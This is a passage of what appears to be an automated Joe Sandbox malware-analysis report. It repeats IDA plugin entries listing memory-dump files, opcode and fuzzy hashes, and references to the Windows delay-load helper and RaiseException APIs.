                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 502344ba8ec1f8ba7b0fb3a795963eae7902f11ea439fec85331ac359480a1fe
                  • Instruction ID: a11d1a06bd8bac456477752fee3d71fa0e3804f58b8246faba8faef5c19a87c3
                  • Opcode Fuzzy Hash: 502344ba8ec1f8ba7b0fb3a795963eae7902f11ea439fec85331ac359480a1fe
                  • Instruction Fuzzy Hash: EAB0129666C101BC314C61046C22E36372CC1C5B20330851BBE09D0143E5849C887032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 335f229eebb9cfd195cdadcfb49733d217d136ca06d1f40c9d54deba7a399835
                  • Instruction ID: bab5dd6e457fb7d7fabfdf9d9be19d6111c7d37baf920af5ff136f0b01042080
                  • Opcode Fuzzy Hash: 335f229eebb9cfd195cdadcfb49733d217d136ca06d1f40c9d54deba7a399835
                  • Instruction Fuzzy Hash: 8AB0129667D201BC354C61046C22E36372CC1C0B20330451BBA09D0153E5849C887032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c710ae196816a762cb09ae3e4fca39ab156c467cf79fec62bf053513467e8cb7
                  • Instruction ID: efe5f95061fa4c69baf360a8634c845a4cdf6cb0ca7906ace4c3f40bf1c29c09
                  • Opcode Fuzzy Hash: c710ae196816a762cb09ae3e4fca39ab156c467cf79fec62bf053513467e8cb7
                  • Instruction Fuzzy Hash: 47B0129666C205BC314C21006E22D36372CC2C0B20330461BBA05E0043A5849CC87032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 3ddcda37ec907cf05183ef21e0dcc18afb62397d7b9104d13f88a9b94108bbb8
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: 3ddcda37ec907cf05183ef21e0dcc18afb62397d7b9104d13f88a9b94108bbb8
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6da8b927f9ad00f62078625828ff685e99c2837303326f871d28bde15e371b7d
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: 6da8b927f9ad00f62078625828ff685e99c2837303326f871d28bde15e371b7d
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: eca2c4c301bfbac59e44c80ec6b7e25a76e6291972b6584ee115a51b5cf06204
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: eca2c4c301bfbac59e44c80ec6b7e25a76e6291972b6584ee115a51b5cf06204
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b89d8b1b963461d92802d9b3a9c292fd3bd97584d1b674bc6363e543a7ac4da4
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: b89d8b1b963461d92802d9b3a9c292fd3bd97584d1b674bc6363e543a7ac4da4
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b4b6fbd36b1a8ac1274615c6a69af3493d2a2dbbbaf86b53584f8b8131fbdc96
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: b4b6fbd36b1a8ac1274615c6a69af3493d2a2dbbbaf86b53584f8b8131fbdc96
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2b5a8740bf183f11c07784bb0178451c78a4e9427c1d04780e4e65d86f1aa18
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: d2b5a8740bf183f11c07784bb0178451c78a4e9427c1d04780e4e65d86f1aa18
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: ba7fcef177e144b2769dd51eeaa08d962294a6ca1d8c010a656c043fbb002612
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: ba7fcef177e144b2769dd51eeaa08d962294a6ca1d8c010a656c043fbb002612
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: af15bab0c0edce6cfbd2bb9b6090eb252bc0588f253759ba2a9e9b9bca860c4f
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: af15bab0c0edce6cfbd2bb9b6090eb252bc0588f253759ba2a9e9b9bca860c4f
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: cfd768160f3ba08e7b36c3655817eca09ad519238efa6cfd80de3b6b315cb10b
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: cfd768160f3ba08e7b36c3655817eca09ad519238efa6cfd80de3b6b315cb10b
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 516b30b41d345f7c1c2c6fe6632d8f6573465c67c21fbe07f509f383727486ec
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: 516b30b41d345f7c1c2c6fe6632d8f6573465c67c21fbe07f509f383727486ec
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4D8A3
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a1ac40134003283f4caf270eec49e9481aef6327f1c04fc8d99f73eb00168aab
                  • Instruction ID: 39137951a5f543a8ffb90fbf1c7699ab69620d0a7bd567259d72a971e869de23
                  • Opcode Fuzzy Hash: a1ac40134003283f4caf270eec49e9481aef6327f1c04fc8d99f73eb00168aab
                  • Instruction Fuzzy Hash: C5A0029656D5067C311861516D56D36261CC4C5B657304559B846D44C1954458497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 66198a17943fb846f87164867a3ed44b522bb8b538ebf5ce5e2ff4a3de6196c5
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 66198a17943fb846f87164867a3ed44b522bb8b538ebf5ce5e2ff4a3de6196c5
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7c5f4fb1df1bbee244d9fadf27902c97e3390bdab7cbdf5392ecea2606bdb2bd
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 7c5f4fb1df1bbee244d9fadf27902c97e3390bdab7cbdf5392ecea2606bdb2bd
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1586f9af7d3365274489b055dedaf8a5afa0b1266f419f7e9d7413ae0caa8c0d
